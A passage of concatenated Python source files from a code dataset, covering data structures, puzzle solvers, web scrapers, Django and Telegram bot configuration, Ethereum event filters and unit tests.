chain\n\t\t'''\n\t\treturn len(self.list)\t\t\n\n\n\nclass DL_Node:\n\t'''\n\tThis class will create the node that will be added to the chain\n\t'''\n\tdef __init__(self, data, prev_node = None, next_node = None):\n\t\t'''\n\t\tThe Constructor will initialize the necessary variables\n\t\tIt will also create the data, and if needed, the next_pointer and the prev_pointer\n\t\t'''\t\t\n\t\tself.next_ptr = None\n\t\tself.data = None\n\t\tself.prev_ptr = None\n\n\t\tif prev_node != None and prev_node != 0:\n\n\t\t\tself.next_ptr = None\n\t\t\tprev_node.next_ptr = self\n\t\t\tself.prev_ptr = prev_node\n\t\t\tself.data = data\n\t\t\t\n\t\telse:\n\t\t\tself.prev_ptr = None\n\t\t\tself.next_ptr = None\n\t\t\tself.data = data\n\n\n\tdef next(self):\n\t\t'''\n\t\tDeze functie zal het volgende element in de chain returnen\n\t\t'''\t\t\n\t\treturn self.next_ptr\n\n\n","sub_path":"Opdr1 + Opdr2 + Opdr3/Opdr1-Shadow/dlchain.py","file_name":"dlchain.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"126319791","text":"class Solution:\n def solveNQueens(self, n: int):\n board = [['.']*n for _ in range(n)]\n\n def is_valid(board, r, c):\n for i in range(n):\n for j in range(n):\n if board[i][j] == 'Q' and (i == r or j == c or abs(i-r) == abs(j-c)):\n return False\n return True\n\n res = []\n\n def recall(board, row):\n if row == n:\n res.append([''.join(i) for i in board])\n return\n for c in range(n):\n print(is_valid(board, row, c))\n if not is_valid(board, row, c):\n continue\n board[row][c] = 'Q'\n recall(board, row + 1)\n board[row][c] = '.'\n\n recall(board, 0)\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n res = s.solveNQueens(4)\n print(len(res), res)\n# 23","sub_path":"code_practice/dfs/eight_queen.py","file_name":"eight_queen.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278386775","text":"import time\nimport numpy as np\nfrom datetime import datetime\n\nfrom urllib import request\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nfrom tqdm import tqdm\n\n\nCHROMEHEAD = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Cache-Control': 'max-age=0',\n 'Content-Length': 84,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'www.dce.com.cn',\n 'Origin': 'http://www.dce.com.cn',\n 'Proxy-Connection': 'keep-alive',\n 'Referer': None,\n 'Upgrade-Insecure-Requests': 1,\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n }\n\ndef show_download(a, b, c):\n per = 100.0 * a * b / c\n if per > 100:\n per = 100\n print ('%.2f%%' % per)\n\nclass DashangCrawler:\n \"\"\"大商所的数据爬虫,主要爬取每日交易数据\n\n 关键属性:\n headers: 使用Chrome的Header,注意完全不需要cookies,所以不用乱抓cookies\n \"\"\"\n def __init__(self):\n self.url = 'http://www.dce.com.cn/publicweb/quotesdata/exportDayQuotesChData.html'\n self.headers = CHROMEHEAD\n # self.headers['Content-Length'] = 84\n self.headers['Referer'] = self.url\n opener = request.build_opener()\n opener.addheaders = list(self.headers.items())\n request.install_opener(opener)\n\n def get_daily_data(self, date, type_of_goods='all',trade_type=0, download_filetype='txt', suffix='csv'):\n \"\"\"根据日期获取数据,并将数据保存在'../data/dashang_data/'文件夹下,以货种_日期方式命名\n\n args:\n date: datetime 类型,请用datetime.datetime(2018, 4, 3)方式来声明\n type_of_goods: 对应request post data中的'dayQuotes.variety', 就是货类, default:all\n trade_type: 对应request post data中的'trade_type'\n download_filetype: 下载的文件类型,默认为txt, 大商所api支持txt和excel\n suffix: 保存文件的后缀,默认为csv,方便pandas.read_csv使用\n\n 注意:\n 大商所的api并不识别非法日期,如果当日无数据,则直接下载一个空的数据表.\n \"\"\"\n if download_filetype == 'excel': # 如果下载的是excel文件, 文件名变更为xls\n suffix = 'xls'\n\n values = {\n 'dayQuotes.variety': type_of_goods,\n 'dayQuotes.trade_type': trade_type,\n 'year': date.year,\n 'month': date.month-1,\n 'day': str(date.day) if date.day > 9 else '0%s' % date.day,\n 'exportFlag': download_filetype\n }\n \n params = urlencode(values).encode('utf-8')\n\n date_str = date.strftime(\"%Y-%m-%d\")\n filename = f'../data/dashang_data/{type_of_goods}_{date_str}.{suffix}'\n\n result = request.urlretrieve(self.url, filename, data=params)\n return result[1].as_string()\n\n ###################################################################################\n # 调试用\n #\n # def get_index_page(self):\n # url = 'http://www.dce.com.cn/dalianshangpin/dalianshangpin_PAGE_KEY/index.html'\n # req = Request(url)\n # res = urlopen(req)\n # return res.read().decode('utf-8')\n\n # def get_daily_page(self):\n # url = 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n # self.headers.pop('Content-Length')\n # self.headers.pop('Content-Type')\n # self.headers.pop('Cache-Control')\n # self.headers.pop('Origin')\n # self.headers.pop('Referer')\n\n # values = {\n # 'dayQuotes.variety': 'all',\n # 'dayQuotes.trade_type': 0,\n # 'year': 2019,\n # 'month': 0,\n # 'day': '03'\n # }\n # params = urlencode(values).encode('utf-8')\n # req = Request(url, headers=self.headers)\n # resp = urlopen(req)\n # return resp.read().decode('utf-8')\n ###################################################################################\n \ndef get_working_date():\n \"\"\"get 2018 year working days, excluding holidays suchas 2018-4-5(清明节)\n\n return:\n list\n \"\"\"\n holidays = ['2018-04-05', '2018-04-06', '2018-04-07', '2018-04-29',\n '2018-04-30', '2018-05-01', '2018-06-18', '2018-09-24',\n '2018-10-01', '2018-10-02', '2018-10-03', '2018-10-04',\n '2018-10-05']\n holidays = [datetime.strptime(d, '%Y-%m-%d').date() for d in holidays]\n days = np.arange('2018-04', '2018-11', dtype='datetime64[D]')\n days = [d.astype(datetime) for d in days]\n work_days = [d for d in days if d.weekday() not in [5, 6] and d not in holidays]\n return work_days\n\n\ndef main():\n crawler = DashangCrawler()\n taily = 0\n print('download start')\n days = get_working_date()\n for i in tqdm(days, ncols=100, desc='progress:'):\n crawler.get_daily_data(i)\n time.sleep(0.5)\n taily += 1\n print('download success, ttl download %s files!' % taily)\n\n\nmain()\n","sub_path":"dashang_spider/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"447162979","text":"from dotenv import load_dotenv\nload_dotenv()\n\nimport os\nfrom lxml import etree\nfrom transunion import TransunionApi\nimport app as main\nfrom datetime import datetime, timezone\n\nimport unittest\n\n\nclass test_transunion(unittest.TestCase):\n\tdef test_xml(self):\n\t\targs = {\n\t\t\t'first': 'first',\n\t\t\t'middle': 'middle',\n\t\t\t'last': 'last',\n\t\t\t'address': 'address',\n\t\t\t'city': 'city',\n\t\t\t'state': 'state',\n\t\t\t'zip': '99999',\n\t\t\t'ssn': '123456789'\n\t\t}\n\t\tt = TransunionApi(args)\n\t\tt.get_request_xml()\n\t\t#make sure we're always creating a valid XML doc\n\t\tself.assertTrue(etree.fromstring(t.xml_request) is not None)\n\n\tdef test_credentials_present(self):\n\t\tself.assertTrue(\n\t\t\tos.getenv(\"SYSTEM_ID\") and\n\t\t\tos.getenv(\"ENVIRONMENT\") and\n\t\t\tos.getenv(\"TURI\") and\n\t\t\tos.getenv(\"PASSWORD\") and\n\t\t\tos.getenv(\"MARKET\") and\n\t\t\tos.getenv(\"SUBMARKET\") and\n\t\t\tos.getenv(\"INDUSTRY_CODE\") and\n\t\t\tos.getenv(\"MEMBER_CODE\") and\n\t\t\tos.getenv(\"SYSTEM_PW\") and\n\t\t\tos.getenv(\"VENDOR_ID\") and\n\t\t\tos.getenv(\"VENDOR_NAME\") and\n\t\t\tos.getenv(\"SOFTWARE_NAME\") and\n\t\t\tos.getenv(\"SOFTWARE_VERSION\") and\n\t\t\tos.getenv(\"PERMISSIBLE_PURPOSE\") and\n\t\t\tos.getenv(\"END_USER\") and\n\t\t\tos.getenv(\"CERTIFICATE_PATH\") and\n\t\t\tos.getenv(\"KEY_PATH\")\n\t\t)\n\n# class test_docusign(unittest.TestCase):\n\n# class test_mailmerge(unittest.TestCase):\nclass test_util(unittest.TestCase):\n\tdef test_credentials_present(self):\n\t\tself.assertTrue(os.getenv(\"FERNET_KEY\"))\n\n\tdef test_symmetric_enc(self):\n\t\toriginal_message = \"foo\"\n\t\tencrypted = \"\"\n\t\twith main.app.test_request_context(path=\"/util/aes/en?message=\" + original_message, method=\"GET\"):\n\t\t\tencrypted = main.get_encrypted()[\"encrypted\"]\n\t\t\tself.assertTrue(encrypted and encrypted != original_message)\n\n\t\twith main.app.test_request_context(path=\"/util/aes/de?message=\" + encrypted,method=\"GET\"):\n\t\t\tdecrypted = main.get_decrypted()\n\t\t\tself.assertTrue(decrypted.status_code == 401)\n\n\n\tdef test_unix_timestamp(self):\n\t\tmonth = \"11\"\n\t\tday = \"12\"\n\t\tyear = \"2019\"\n\t\tpath = \"/util/hubspot_timestamp?month=\" + month + \"&day=\" + day + \"&year=\" + year\n\t\twith main.app.test_request_context(path=path, method=\"GET\"):\n\t\t\ttimestamp = main.get_hubspot_timestamp()['timestamp']\n\t\t\t#make sure this works in reverse to get the original date we provided\n\t\t\t#also make sure it corresponds to time = 00:00:00, because Hubspot will annoyingly reject non-midnight values\n\t\t\tdt = datetime.fromtimestamp(timestamp/1000, tz=timezone.utc)\n\t\t\tself.assertTrue(\n\t\t\t\tdt.day == 12 and dt.month == 11 and dt.year == 2019 and\n\t\t\t\tdt.hour == 0 and dt.minute == 0 and dt.second == 0\n\t\t\t)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"113570657","text":"from eth_utils import (\n decode_hex,\n event_abi_to_log_topic,\n)\nfrom web3 import Web3\nfrom web3.utils.abi import filter_by_type\nfrom web3.utils.events import get_event_data\nfrom eth_utils import to_checksum_address\nfrom web3.utils.filters import construct_event_filter_params, LogFilter\nfrom pkg_resources import DistributionNotFound\nfrom gevent.lock import Semaphore\n\nfrom raiden_contracts.contract_manager import CONTRACT_MANAGER\nfrom raiden_contracts.constants import CONTRACT_TOKEN_NETWORK, EVENT_CHANNEL_OPENED\n\nfrom raiden.utils.typing import Address, ChannelID, BlockSpecification, Dict\n\ntry:\n from eth_tester.exceptions import BlockNotFound\nexcept (ModuleNotFoundError, DistributionNotFound):\n class BlockNotFound(Exception):\n pass\n\n\ndef get_filter_args_for_specific_event_from_channel(\n token_network_address: Address,\n channel_identifier: ChannelID,\n event_name: str,\n from_block: BlockSpecification = 0,\n to_block: BlockSpecification = 'latest',\n):\n \"\"\" Return the filter params for a specific event of a given channel. \"\"\"\n if not event_name:\n raise ValueError('Event name must be given')\n\n event_abi = CONTRACT_MANAGER.get_event_abi(CONTRACT_TOKEN_NETWORK, event_name)\n\n # Here the topics for a specific event are created\n # The first entry of the topics list is the event name, then the first parameter is encoded,\n # in the case of a token network, the first parameter is always the channel identifier\n _, event_filter_params = construct_event_filter_params(\n event_abi=event_abi,\n contract_address=to_checksum_address(token_network_address),\n argument_filters={\n 'channel_identifier': channel_identifier,\n },\n fromBlock=from_block,\n toBlock=to_block,\n )\n\n return event_filter_params\n\n\ndef get_filter_args_for_all_events_from_channel(\n token_network_address: Address,\n channel_identifier: ChannelID,\n from_block: BlockSpecification = 0,\n to_block: BlockSpecification = 'latest',\n) -> Dict:\n \"\"\" Return the filter params for all events of a given channel. \"\"\"\n\n event_filter_params = get_filter_args_for_specific_event_from_channel(\n token_network_address=token_network_address,\n channel_identifier=channel_identifier,\n event_name=EVENT_CHANNEL_OPENED,\n from_block=from_block,\n to_block=to_block,\n )\n\n # As we want to get all events for a certain channel we remove the event specific code here\n # and filter just for the channel identifier\n # We also have to remove the trailing topics to get all filters\n event_filter_params['topics'] = [None, event_filter_params['topics'][1]]\n\n return event_filter_params\n\n\ndef decode_event(abi: Dict, log: Dict):\n \"\"\" Helper function to unpack event data using a provided ABI\n\n Args:\n abi: The ABI of the contract, not the ABI of the event\n log: The raw event data\n\n Returns:\n The decoded event\n \"\"\"\n if isinstance(log['topics'][0], str):\n log['topics'][0] = decode_hex(log['topics'][0])\n elif isinstance(log['topics'][0], int):\n log['topics'][0] = decode_hex(hex(log['topics'][0]))\n event_id = log['topics'][0]\n events = filter_by_type('event', abi)\n topic_to_event_abi = {\n event_abi_to_log_topic(event_abi): event_abi\n for event_abi in events\n }\n event_abi = topic_to_event_abi[event_id]\n return get_event_data(event_abi, log)\n\n\nclass StatelessFilter(LogFilter):\n \"\"\" Like LogFilter, but uses eth_getLogs instead of installed filter\n\n Pass latest block_number to get_(new|all)_entries to avoid querying it\n \"\"\"\n\n def __init__(self, web3: Web3, filter_params: dict):\n super().__init__(web3, filter_id=None)\n self.filter_params = filter_params\n self._last_block: int = -1\n self._lock = Semaphore()\n\n def get_new_entries(self, block_number: int = None):\n with self._lock:\n filter_params = self.filter_params.copy()\n filter_params['fromBlock'] = max(\n filter_params.get('fromBlock', 0),\n self._last_block + 1,\n )\n # This logic may contain a race condition. It's possible that after\n # `web.eth.blockNumber` and before `web3.eth.getLogs` a new block is mined.\n # This is okay because any new logs on this new block will be fetched on the\n # next call to `get_new_entries`\n if block_number is None:\n block_number = self.web3.eth.blockNumber\n if self.filter_params.get('toBlock') in ('latest', 'pending'):\n filter_params['toBlock'] = block_number\n self._last_block = filter_params.get('toBlock') or block_number\n try:\n return self.web3.eth.getLogs(filter_params)\n except BlockNotFound:\n return []\n\n def get_all_entries(self, block_number: int = None):\n with self._lock:\n filter_params = self.filter_params.copy()\n if block_number is None:\n block_number = self.web3.eth.blockNumber\n if self.filter_params.get('toBlock') in ('latest', 'pending'):\n filter_params['toBlock'] = block_number\n self._last_block = filter_params.get('toBlock') or block_number\n try:\n return self.web3.eth.getLogs(filter_params)\n except BlockNotFound:\n return []\n","sub_path":"raiden/utils/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458843792","text":"DEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'hhservice',\n 'USER': '{{ social_vacancy_u }}',\n 'PASSWORD': '{{ social_vacancy_p }}',\n 'HOST': '{{ db_social_vacancy }}'.split(':')[0],\n 'PORT': '{{ db_social_vacancy }}'.split(':')[1],\n }\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s %(levelname)s %(module)s %(process)d %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/hh-social-vacancy/hh-social-vacancy.log',\n 'level': 'DEBUG',\n 'formatter': 'verbose',\n },\n 'debug_redirect': {\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/hh-social-vacancy/redirect-hhsocialvacancy.log',\n 'level': 'INFO',\n 'formatter': 'verbose',\n },\n 'syslog': {\n 'class': 'logging.handlers.SysLogHandler',\n 'formatter': 'verbose',\n 'facility': 'user',\n 'level': 'ERROR',\n 'address': '/dev/log',\n }\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'INFO',\n },\n 'hhsocialvacancy': {\n 'level': 'DEBUG',\n 'handlers': ['file'],\n },\n 'djangocanvas': {\n 'level': 'INFO',\n 'handlers': ['file'],\n },\n 'debug_redirect_logger': {\n 'level': 'INFO',\n 'handlers': ['debug_redirect'],\n },\n }\n}\n\nSTATIC_URL = '//isv.hh.ru/'\nTEMPLATE_DIRS = ('/usr/share/hh-social-vacancy/templates', )\n\n#Facebook config\nFACEBOOK_APPLICATION_ID = '{{ sv_facebook_application_id }}'\nFACEBOOK_APPLICATION_SECRET_KEY = '{{ sv_facebook_application_secret_key }}'\nFACEBOOK_APPLICATION_NAMESPACE = '{{ sv_facebook_application_namespace }}'\nFACEBOOK_APPLICATION_CANVAS_URL = '{{ sv_facebook_application_canvas_url }}'\n\n#Vkontakte config\nVK_APP_ID = '{{ sv_vk_app_id }}'\nVK_APP_SECRET = '{{ sv_vk_app_secret }}'\n\n#EXPC-157\nVACANCY_SEARCH_TIMEOUT = 24\n\n#EXPC-341\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')\n\n#EXPC-344\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')\n","sub_path":"public/playbooks/roles/socvac/templates/etc/hh-social-vacancy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"531687038","text":"\n# -*- coding: utf-8 -*-\nimport datetime\nfrom datetime import date\n\n'''\nConverts a date on form YYYY-MM-DD into weekday, e.g måndag, tisdag\n'''\ndef get_weekday(date):\n weekday_dict = {\n 'Monday': 'Måndag', 'Tuesday': 'Tisdag', 'Wednesday': 'Onsdag', \n 'Thursday': 'Torsdag', 'Friday' : 'Fredag', 'Saturday': 'Lördag', \n 'Sunday': 'Söndag'\n }\n \n weekday = date.split('-')\n weekday = datetime.date(int(weekday[0]), int(weekday[1]), int(weekday[2]))\n weekday = weekday.strftime('%A')\n \n try:\n return weekday_dict.get(weekday)\n except: \n print ('Weekday not found in dictionary')\n return None\n \n \n'''\nReturns input form '13 jul' into corresponding number format\nYYYY-MM-DD\n'''\ndef getDate_strFormat(date_str):\n month_dict = {\n 'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'maj': '05',\n 'jun': '06', 'jul': '07', 'aug': '08', 'sep': '09', 'okt': '10',\n 'nov': '11', 'dec': '12'\n }\n try:\n year = str(date.today().year)\n day = date_str.split()[0]\n month = date_str.split()[1]\n month = month_dict.get(month)\n \n if len(day) is 1:\n day = '0' + day\n elif len(day) > 2:\n return 'Wrong date format'\n \n return year+'-'+month+'-'+day\n except:\n return 'Wrong date format'\n \n'''\nReturns input weekday containing three characters into it's full length format\n\ndef getWeekday_strFormat(day_str):\n day_dict = {\n u'M�n': u'M�ndag', 'Tis': 'Tisdag', 'Ons': 'Onsdag', 'Tor': 'Torsdag', 'Fre': 'Fredag', \n u'L�r': u'L�rdag', u'S�n': u'S�ndag'\n }\n try:\n return day_dict.get(day_str)\n except:\n return 'Wrong date format'\n'''\n\n'''\nReturns input weekday containing three characters into it's full length format\n'''\ndef getWeekday_strFormat(day_str):\n day_dict = {\n 'Mån': 'Måndag', 'Tis': 'Tisdag', 'Ons': 'Onsdag', 'Tor': 'Torsdag', 'Fre': 'Fredag', \n 'Lör': 'Lördag', 'Sön': 'Söndag'\n }\n try:\n return day_dict.get(day_str)\n except:\n return 'Wrong date format'\n\n'''\nReturns input date into correct format\n'''\ndef getDate(sDate):\n lstDate = sDate.split('/')\n sReturn = str(date.today().year)\n if len(lstDate[1]) == 1:\n sReturn += '-0%s' % lstDate[1]\n else:\n sReturn += '-%s' % lstDate[1]\n \n if len(lstDate[0]) == 1:\n sReturn += '-0%s' % lstDate[0]\n else:\n sReturn += '-%s' % lstDate[0]\n \n return sReturn\n \n","sub_path":"visning/management/commands/scrapers/help_functions.py","file_name":"help_functions.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576125369","text":"\n\n#calss header\nclass _TEETHE():\n\tdef __init__(self,): \n\t\tself.name = \"TEETHE\"\n\t\tself.definitions = [u'If a baby or small child is teething, their first teeth are growing, usually causing pain: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_teethe.py","file_name":"_teethe.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505691119","text":"\n\nfrom xai.brain.wordbase.nouns._ophthalmologist import _OPHTHALMOLOGIST\n\n#calss header\nclass _OPHTHALMOLOGISTS(_OPHTHALMOLOGIST, ):\n\tdef __init__(self,): \n\t\t_OPHTHALMOLOGIST.__init__(self)\n\t\tself.name = \"OPHTHALMOLOGISTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ophthalmologist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_ophthalmologists.py","file_name":"_ophthalmologists.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"43633211","text":"\"\"\"\nGiven an array of integers A and let n to be its length.\nAssume Bk to be an array obtained by rotating the array A k positions clock-wise,\nwe define a \"rotation function\" F on A as follow:\n\nF(k) = 0 * Bk[0] + 1 * Bk[1] + ... + (n-1) * Bk[n-1].\nCalculate the maximum value of F(0), F(1), ..., F(n-1).\nNote:\nn is guaranteed to be less than 105.\n\"\"\"\nclass Solution(object):\n def maxRotateFunction(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # TLE\n maxR = float('-inf')\n n = len(A)\n for i in range(n):\n B = A[i:n] + A[:i]\n res = 0\n for i, v in enumerate(B):\n res += i * v\n maxR = max(maxR, res)\n return maxR\n\n def maxRotateFunction2(self, A):\n if len(A) == 0: return 0\n sum = iteration = 0\n for i in range(len(A)):\n sum += A[i]\n iteration += (A[i] * i)\n maxR = iteration\n for j in range(1, len(A)):\n iteration = iteration - sum + A[j-1] * len(A)\n maxR = max(maxR, iteration)\n return maxR\n\n def maxRotateFunction3(self, A):\n allSum = F = 0\n for i in range(len(A)):\n F += i * A[i]\n allSum += A[i]\n maxR = F\n for i in range(len(A) - 1, -1, -1):\n F = F + allSum - len(A) * A[i]\n maxR = max(F, maxR)\n return maxR\n\n\"\"\"\nF(k) = 0 * Bk[0] + 1 * Bk[1] + ... + (n-1) * Bk[n-1]\nF(k-1) = 0 * Bk-1[0] + 1 * Bk-1[1] + ... + (n-1) * Bk-1[n-1]\n = 0 * Bk[1] + 1 * Bk[2] + ... + (n-2) * Bk[n-1] + (n-1) * Bk[0]\nthen,\nF(k) - F(k-1) = Bk[1] + Bk[2] + ... + Bk[n-1] + (1-n)Bk[0]\n = (Bk[0] + ... + Bk[n-1]) - nBk[0]\n = sum - nBk[0]\n F(k) = F(k-1) + sum - nBk[0]\n \nWhat is Bk[0]?\nk = 0; B[0] = A[0];\nk = 1; B[0] = A[len-1];\nk = 2; B[0] = A[len-2];\n\"\"\"\n\nA = [4,3,2,6]\n# A = [-2147483648,-2147483648]\nprint(Solution().maxRotateFunction3(A))","sub_path":"396RotateF.py","file_name":"396RotateF.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325483006","text":"from figures import FIGURES\n\nLINE_MAX = 20\n\n\ndef find_longest(lines):\n longest = 0\n for line in lines:\n longest = max(longest, len(line))\n\n return longest\n\n\ndef line_split(line):\n split_lines = [\"\"]\n i = 0\n for word in line.split(' '):\n if len(split_lines[i] + ' ' + word) > LINE_MAX:\n split_lines.append('')\n i += 1\n split_lines[i] += ' ' + word\n\n return split_lines\n\n\ndef normalize(lines):\n longest = find_longest(lines)\n last = len(lines) - 1\n\n for l in range(1, last):\n line_len = len(lines[l])\n lines[l] = lines[l][0:line_len - 2] + ' ' * (longest - line_len) + ' |'\n\n lines[0] += '_' * (longest - len(lines[0]) - 1)\n lines[last] += '-' * (longest - len(lines[last]) - 1)\n\n\ndef make_bubble(lines):\n length = len(lines[0]) + 2\n\n for l in range(len(lines)):\n lines[l] = '| ' + lines[l] + ' |'\n\n underlines = ' '\n for i in range(length):\n underlines += '_'\n lines.insert(0, underlines)\n\n dashes = ' '\n for i in range(length):\n dashes += '-'\n lines.append(dashes)\n\n\ndef cow_said(input_text, figure):\n lines = input_text.splitlines()\n\n for line in lines:\n if len(line) > LINE_MAX:\n split_lines = line_split(line)\n pos = lines.index(line)\n lines.remove(line)\n lines[pos:pos] = split_lines\n\n make_bubble(lines)\n\n normalize(lines)\n\n says = '```' + '\\n'.join(lines) + FIGURES[figure] + '```'\n return says\n","sub_path":"cow.py","file_name":"cow.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"227329854","text":"# coding: utf-8\nfrom telegram.ext import Updater\nimport config\nimport logging\nfrom user_handlers import custom_handlers\nfrom user_jobs import custom_jobs\nfrom user_handlers.__error_handle import error_callback\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\nif config.PROXY:\n proxy_url = config.PROXY_URL\n updater = Updater(token=config.TOKEN, request_kwargs={'proxy_url': proxy_url})\nelse:\n updater = Updater(token=config.TOKEN)\ndispatcher = updater.dispatcher\njob = updater.job_queue\n\n# handle error\ndispatcher.add_error_handler(error_callback)\n\n# handle user_handlers\nfor handler in custom_handlers:\n dispatcher.add_handler(handler)\n\n# jobs\nfor job_info in custom_jobs:\n job.run_repeating(**job_info)\n\nif __name__ == '__main__':\n # polling mode\n updater.start_polling()\n updater.idle()\n\n # Webhook mode\n # updater.start_webhook(listen='127.0.0.1', port=12306, url_path='TOKEN')\n # updater.bot.set_webhook(url='https://telegram.xxx.xx/TOKEN')\n # updater.idle()\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56750311","text":"from django.conf.urls import include, url\nfrom rest_framework import routers\n\nfrom .views import (CreateCallViewSet, EndCallViewSet, MonthlyBillingView)\n\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.DefaultRouter()\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^call/start/$', CreateCallViewSet.as_view()),\n url(r'^call/(?P[0-9]+)/end/$', EndCallViewSet.as_view()),\n url(r'^bills/(?P[0-9]+)/$', MonthlyBillingView.as_view())\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347447959","text":"import os\n\nimport scrapy\nimport requests\n\nfrom isentia.items import IsentiaItem\n\n\nclass IsentiaSpider(scrapy.Spider):\n name = 'isentia'\n start_urls = [\n 'https://www.isentia.com/news/blog/ideas',\n 'https://www.isentia.com/news/blog/issues-that-matter',\n 'https://www.isentia.com/news/blog/viewpoint',\n 'https://www.isentia.com/news/blog/access-project'\n ]\n\n def parse(self, response):\n \"\"\"\n Parse links to Isentia blog post articles from subject index page and\n follow links to parse article contents.\n \"\"\"\n for href in response.xpath('//h2//a'):\n yield response.follow(href, callback=self.parse_article)\n\n def parse_article(self, response):\n \"\"\"\n Parse contents of Isentia blog post yielding an IsentiaItem.\n \"\"\"\n item = IsentiaItem()\n item['author'] = 'Isentia',\n item['text'] = self.cleansed(response.css('#main-content')),\n item['url'] = response._url,\n item['headline'] = response.xpath(\n '//h1/text()').extract_first().strip(),\n item['sub_heading'] = response.xpath(\n '//h2/text()').extract_first().strip()\n yield item\n\n def cleansed(self, content):\n \"\"\"\n Extract cleansed plaintext from nested html elements.\n\n XPath expression was inspired by:\n https://stackoverflow.com/questions/26301831/extracting-text-xpath-scrapy\n \"\"\"\n tokens = content.xpath('descendant-or-self::*/text()').extract()\n return ' '.join([t.strip() for t in tokens if t]).strip()\n","sub_path":"isentia/isentia/spiders/isentia_spider.py","file_name":"isentia_spider.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99063656","text":"import unittest\nimport sys\nsys.path.append(\"../\")\nfrom Models.payment import *\n\nclass TestPayment(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.juan_payment = Payment(\"Visa\", \"12345678\", \"Juan Gnecco\")\n\n def test_user_payment_is_a_user_payment(self):\n self.assertIsInstance(self.juan_payment, Payment)\n\n def test_user_can_enter_payment_credentials(self):\n self.assertEqual(self.juan_payment.get_full_name(), \"Juan Gnecco\")\n self.assertEqual(self.juan_payment.get_payment_type(), \"Visa\")\n self.assertEqual(self.juan_payment.get_account_number(), \"12345678\")\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n","sub_path":"Tests/payment_test.py","file_name":"payment_test.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"305014573","text":"from .header import *\n\n'''\nEncoder component for ReGe\ninpt: \n src: [seq, batch, embedding]\n src_l: [batch]\nopt:\n context: [seq, batch, hidden]\n hidden: [batch, hidden]\n'''\n\nclass GRUEncoder(nn.Module):\n\n def __init__(self, embed_size, hidden_size, \n n_layers=1, dropout=0.5, bidirectional=True):\n super(GRUEncoder, self).__init__()\n 